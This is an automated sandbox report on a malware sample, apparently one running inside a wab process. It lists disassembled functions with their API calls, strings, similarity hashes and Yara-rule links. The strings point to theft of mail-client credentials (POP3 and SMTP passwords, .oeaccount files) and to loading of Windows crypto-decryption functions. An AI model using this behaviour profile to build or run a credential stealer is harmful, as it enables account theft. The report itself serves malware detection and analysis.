                                                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410DBB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                              • memset.MSVCRT ref: 00410E10
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                                                                                              • _mbscpy.MSVCRT ref: 00410E87
                                                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                              Strings
                                                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                              • API String ID: 889583718-2036018995
                                                                                              • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                                                              • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                              • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                              • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                              • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                                              • String ID:
                                                                                              • API String ID: 3473537107-0
                                                                                              • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                              • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                              • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                              • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004109CF Relevance: 6.1, APIs: 4, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 004109F7
                                                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                                                • Part of subcall function 004075CD: memcpy.MSVCRT ref: 00407618
                                                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                                                              • memset.MSVCRT ref: 00410A32
                                                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                              • String ID:
                                                                                              • API String ID: 3143880245-0
                                                                                              • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                                                              • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00408D34 Relevance: 5.0, APIs: 4, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@
                                                                                              • String ID:
                                                                                              • API String ID: 1033339047-0
                                                                                              • Opcode ID: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                              • Instruction ID: b7305a6f8e60e4354fc193aeb8e5872e67636dbc7b7f4d43fc505f02bd19535d
                                                                                              • Opcode Fuzzy Hash: 13d41e296071d90ab44a737b93fda326391e3e8b074f3b81c3e25c1d737bd7ac
                                                                                              • Instruction Fuzzy Hash: EEF031F05433615EEB559F34ED0672536A4E784302F024B3EE2059A2E6EB78D4908B09
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406F30 Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??3@mallocmemcpy
                                                                                              • String ID:
                                                                                              • API String ID: 3831604043-0
                                                                                              • Opcode ID: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                              • Instruction ID: 20c18abb4fba39fec419649699297209b7413d51c31022bf8d4f5bc21a778af6
                                                                                              • Opcode Fuzzy Hash: a96fb65c017a86587ba071467795d458f8ca9669e817bb347d51b960c43a4168
                                                                                              • Instruction Fuzzy Hash: 39F0E9726092235FD7089E7AB881D0BB3ADEF94324711482FF445E7281D738EC60C6A8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407088 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                                                                              • CreateFontIndirectA.GDI32(?), ref: 004070A6
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFontIndirect_mbscpymemset
                                                                                              • String ID: Arial
                                                                                              • API String ID: 3853255127-493054409
                                                                                              • Opcode ID: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                              • Instruction ID: 3e85f73e1de40fb669f60d67ce34a2ecc2b5129f84855d11383e820b071861b9
                                                                                              • Opcode Fuzzy Hash: a9edf0add2530cae1e73dc887b0500a6e6731c557fb9a9d8b72d1c15ab1f178d
                                                                                              • Instruction Fuzzy Hash: FDD0C9A0E4020D67D710F7A0FD47F49776C5B00604F510831B905F10E1EAA4A1184A99
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040CE70 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00401E69: memset.MSVCRT ref: 00401E8B
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EA4
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EB2
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401EF8
                                                                                                • Part of subcall function 00401E69: strlen.MSVCRT ref: 00401F06
                                                                                              • _strcmpi.MSVCRT ref: 0040CEC3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: strlen$_strcmpimemset
                                                                                              • String ID: /stext
                                                                                              • API String ID: 520177685-3817206916
                                                                                              • Opcode ID: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                              • Instruction ID: 693fdb5656bfadad22d3d4febeb48e05c11e25f360cf1d4a61822c7fe8fbaaaa
                                                                                              • Opcode Fuzzy Hash: 8aa79a490ab9c6e021e7ced4863df28004c69c197a86612b5f6291033182a9ac
                                                                                              • Instruction Fuzzy Hash: 5B210C71614112DFC3589B39C8C1966B3A9BF45314B15427FA91AAB392C738EC119BC9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0044B435 Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualProtect.KERNELBASE(?,00000078,00000004), ref: 0044B43E
                                                                                              • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000078,00000004), ref: 0044B452
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ProtectVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 544645111-0
                                                                                              • Opcode ID: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                                                              • Instruction ID: ac13c79d7fe72252008cad2d8c7d399cb1c4cdb5f22be9a76d9ffffc69c753be
                                                                                              • Opcode Fuzzy Hash: 7b0ab345f8b147095ec499268aed239778a4d345bd8648cab821ed5a180e1bce
                                                                                              • Instruction Fuzzy Hash: 86F0A4011896907DFA2199B90C42BB75BCCCB27320B240B4BF690C7283D69DCA1693FA
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404734 Relevance: 3.0, APIs: 2, Instructions: 24libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00404785: FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                              • LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$AddressFreeLoadProc
                                                                                              • String ID:
                                                                                              • API String ID: 145871493-0
                                                                                              • Opcode ID: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                              • Instruction ID: d196b3276b1a656cda378f5c53e28a4a33de773bbf59b12af1a3f4d2ec041ade
                                                                                              • Opcode Fuzzy Hash: e4129e6d3a026a155dd617c709f60e93ed044a3dbb6052f4ffd7ea6f87d7a192
                                                                                              • Instruction Fuzzy Hash: 35F065F8500B039BD7606F34D84879BB3E9AF86310F00453EF961A3281EB38E541CB58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410A6B Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410A92
                                                                                                • Part of subcall function 00410983: memset.MSVCRT ref: 004109A1
                                                                                                • Part of subcall function 00410983: _itoa.MSVCRT ref: 004109B8
                                                                                                • Part of subcall function 00410983: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 004109C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                              • String ID:
                                                                                              • API String ID: 4165544737-0
                                                                                              • Opcode ID: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                              • Instruction ID: e4187046b5889157fb54d5f6e3f9ccfafaefd38d22cef98a7399574687248963
                                                                                              • Opcode Fuzzy Hash: 0f5553da0f286b85af357dba121878114d67176469d1de62f709c8355ffa0996
                                                                                              • Instruction Fuzzy Hash: 3DE0B63204020DBFDF125F90EC01AA97B66FF14355F14845AF95804131D37295B0AF94
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00404785 Relevance: 1.5, APIs: 1, Instructions: 11COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,?,0040F7FC,?,00000000), ref: 0040479A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                              • Instruction ID: 8a1fb59f4aee03ee333bbcbb21747f572c22b5e480e1b07aa067c0b07a2bbf9c
                                                                                              • Opcode Fuzzy Hash: 4a0d43cc5f0709c12baa610e5074795180c2b0919147646b8d68fcb243e336cc
                                                                                              • Instruction Fuzzy Hash: D2D012750013118FD7605F14FC4CBA173E8AF41312F1504B8E990A7196C3389540CA58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406D1A Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040AEA3,00000000), ref: 00406D2C
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                              • Instruction ID: b62e2d47ef034db7175ca84798afaf0fa2498f7b6fd9cc80310e9c1c0838826b
                                                                                              • Opcode Fuzzy Hash: 426545caef3dd143a0415f2b0fbb8f01fd74bbd6145b7d3b9bbfc6057fee2153
                                                                                              • Instruction Fuzzy Hash: 59C012F02503007EFF204F10AC4BF37355DE780700F204420BE00E40E2C2A14C008928
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004107F1 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                              • Instruction ID: 34cea44665fc180de0fd44d6926484b1362fa2b4776eba2aa4e53c033fc5eded
                                                                                              • Opcode Fuzzy Hash: 3a17cf7f6aedc8a82690d1348ce7bffc6ab01239e51e6fc2cf21b6a25e88fa5d
                                                                                              • Instruction Fuzzy Hash: 8CC04C355107018BE7219B12C949763B7E4BB00316F54C81894A695454D77CE494CE18
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410CF3 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • EnumResourceNamesA.KERNEL32(?,?,Function_00010C68,00000000), ref: 00410D02
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnumNamesResource
                                                                                              • String ID:
                                                                                              • API String ID: 3334572018-0
                                                                                              • Opcode ID: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                              • Instruction ID: 5afcab74deb5f1f746bbc86617496166ce7982b7e139a3a4a0d32d3f52cd2e16
                                                                                              • Opcode Fuzzy Hash: b3588a68add1f6d45fd601d09e3ffe49e4267215e4b3f537158054a437bee868
                                                                                              • Instruction Fuzzy Hash: 05C09B3119534197C7519F108C4DF1B7695BB59706F144D297191940A4D7514054DE05
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407F90 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • FindClose.KERNELBASE(?,00407EAA,?,?,00000000,ACD,0044424D,*.oeaccount,ACD,?,00000104), ref: 00407F9A
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 1863332320-0
                                                                                              • Opcode ID: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                              • Instruction ID: 6a16c08ea37d16c8a4aa15d9076e95747955e6fceefd1cb8b530e80fb020b3ed
                                                                                              • Opcode Fuzzy Hash: 57b8da30fad5a7bddd67670d8939520a2ad49927f904eaf4d9e0c7dde32a44f9
                                                                                              • Instruction Fuzzy Hash: 6DC092746165029FD22C5F38ECA942A77A1AF4A7303B80F6CE0F3D20F0E73898528A04
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00410A9C Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                              • Instruction ID: dc05f55a30c25c5fac933af4dde5d03becff9f0601af4caa575784a6c8c77920
                                                                                              • Opcode Fuzzy Hash: dc2f54250d009d21d03b042bef434314c6075f5cef50a571bf2f69934a328f8c
                                                                                              • Instruction Fuzzy Hash: F4C09B35545301FFDE114F40FD45F09BB61AB84B05F004414B244240B182714414EB17
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00406F81 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                              • Instruction ID: 9c49554ec541f0f53bfa1b31c7f3910b3cb34ca890cc3578c2bd02f8d22bfc28
                                                                                              • Opcode Fuzzy Hash: fa0a746f1e19b68873f4d8ea5d8c23283e8dccdc4d936350afbdeaa92e1ec6ad
                                                                                              • Instruction Fuzzy Hash: 0CB012B92110004BCB0807349C8904D36505F456317240B3CB033C01F0D720CCA0BE00
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 004047CB Relevance: 38.5, APIs: 11, Strings: 11, Instructions: 49libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll,?,00404A70,?,00404986,?,?,00000000,?,00000000,?), ref: 004047DA
                                                                                              • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004047EE
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptReleaseContext), ref: 004047FA
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptCreateHash), ref: 00404806
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptGetHashParam), ref: 00404812
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptHashData), ref: 0040481E
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyHash), ref: 0040482A
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDecrypt), ref: 00404836
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDeriveKey), ref: 00404842
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptImportKey), ref: 0040484E
                                                                                              • GetProcAddress.KERNEL32(0045A9A8,CryptDestroyKey), ref: 0040485A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                              • String ID: CryptAcquireContextA$CryptCreateHash$CryptDecrypt$CryptDeriveKey$CryptDestroyHash$CryptDestroyKey$CryptGetHashParam$CryptHashData$CryptImportKey$CryptReleaseContext$advapi32.dll
                                                                                              • API String ID: 2238633743-192783356
                                                                                              • Opcode ID: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                              • Instruction ID: 70faa285c49fb169990c8fbe2f493e995bb0ef80ad344915aa685f594b7479e2
                                                                                              • Opcode Fuzzy Hash: cd939ae61559ee60ed20598dae0af8bfb6f23e93240650da69a7d260c9c9fdd8
                                                                                              • Instruction Fuzzy Hash: 1101C978E40744AEDB316F76CC09E06BEE1EF9C7047214D2EE1C153650D77AA011DE48
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004033F0 Relevance: 7.6, Strings: 6, Instructions: 61COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                              • API String ID: 3963849919-1658304561
                                                                                              • Opcode ID: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                              • Instruction ID: 768c2722c01e59d080de5de3380f4e9b1c28328498c4b4a1784570bb69a0741a
                                                                                              • Opcode Fuzzy Hash: abaa3120f3dadaa33e6fded1ed61a921173bd62cd5413d2d65547edf030f73d6
                                                                                              • Instruction Fuzzy Hash: B2213371D0111C6ADB61EB51DC82FEE7B7C9B44705F0400EBBA08B2082DBBC6F898E59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 004016FD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000D.00000002.2421630765.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                                                                              Similarity
                                                                                              • API ID: ??2@??3@memcpymemset
                                                                                              • String ID: (yE$(yE$(yE
                                                                                              • API String ID: 1865533344-362086290
                                                                                              • Opcode ID: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                              • Instruction ID: 81f979815271b6a149e92529059c9b1765a635985cdb271dadbae3a2bc10ddb4
                                                                                              • Opcode Fuzzy Hash: 0ccdd0ead4f7f762e657c049d916cce9c2c11d769d9b83e6b2670f1f2acaaac1
                                                                                              • Instruction Fuzzy Hash: 2D117975900209EFDF119F94C804AAE3BB1FF08326F10806AFD556B2A1C7798915EF69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040E501 Relevance: 54.6, APIs: 21, Strings: 10, Instructions: 314COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 00406B6D: memset.MSVCRT ref: 00406B8E
                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406B99
                                                                                                • Part of subcall function 00406B6D: strlen.MSVCRT ref: 00406BA7
                                                                                                • Part of subcall function 00408934: GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,0040F28D,?,00000000,?,?,?,?,?,?), ref: 00408952
                                                                                                • Part of subcall function 00408934: CloseHandle.KERNEL32(?,?), ref: 0040899C
                                                                                                • Part of subcall function 004089F2: _mbsicmp.MSVCRT ref: 00408A2C
                                                                                              • memset.MSVCRT ref: 0040E5B8
                                                                                              • memset.MSVCRT ref: 0040E5CD
                                                                                              • _mbscpy.MSVCRT ref: 0040E634
                                                                                              • _mbscpy.MSVCRT ref: 0040E64A
                                                                                              • _mbscpy.MSVCRT ref: 0040E660
                                                                                              • _mbscpy.MSVCRT ref: 0040E676
                                                                                              • _mbscpy.MSVCRT ref: 0040E68C
                                                                                              • _mbscpy.MSVCRT ref: 0040E69F
                                                                                              • memset.MSVCRT ref: 0040E6B5
                                                                                              • memset.MSVCRT ref: 0040E6CC
                                                                                                • Part of subcall function 004066A3: memset.MSVCRT ref: 004066C4
                                                                                                • Part of subcall function 004066A3: memcmp.MSVCRT ref: 004066EE
                                                                                              • memset.MSVCRT ref: 0040E736
                                                                                              • memset.MSVCRT ref: 0040E74F
                                                                                              • sprintf.MSVCRT ref: 0040E76D
                                                                                              • sprintf.MSVCRT ref: 0040E788
                                                                                              • _strcmpi.MSVCRT ref: 0040E79E
                                                                                              • _strcmpi.MSVCRT ref: 0040E7B7
                                                                                              • _strcmpi.MSVCRT ref: 0040E7D3
                                                                                              • memset.MSVCRT ref: 0040E858
                                                                                              • sprintf.MSVCRT ref: 0040E873
                                                                                              • _strcmpi.MSVCRT ref: 0040E889
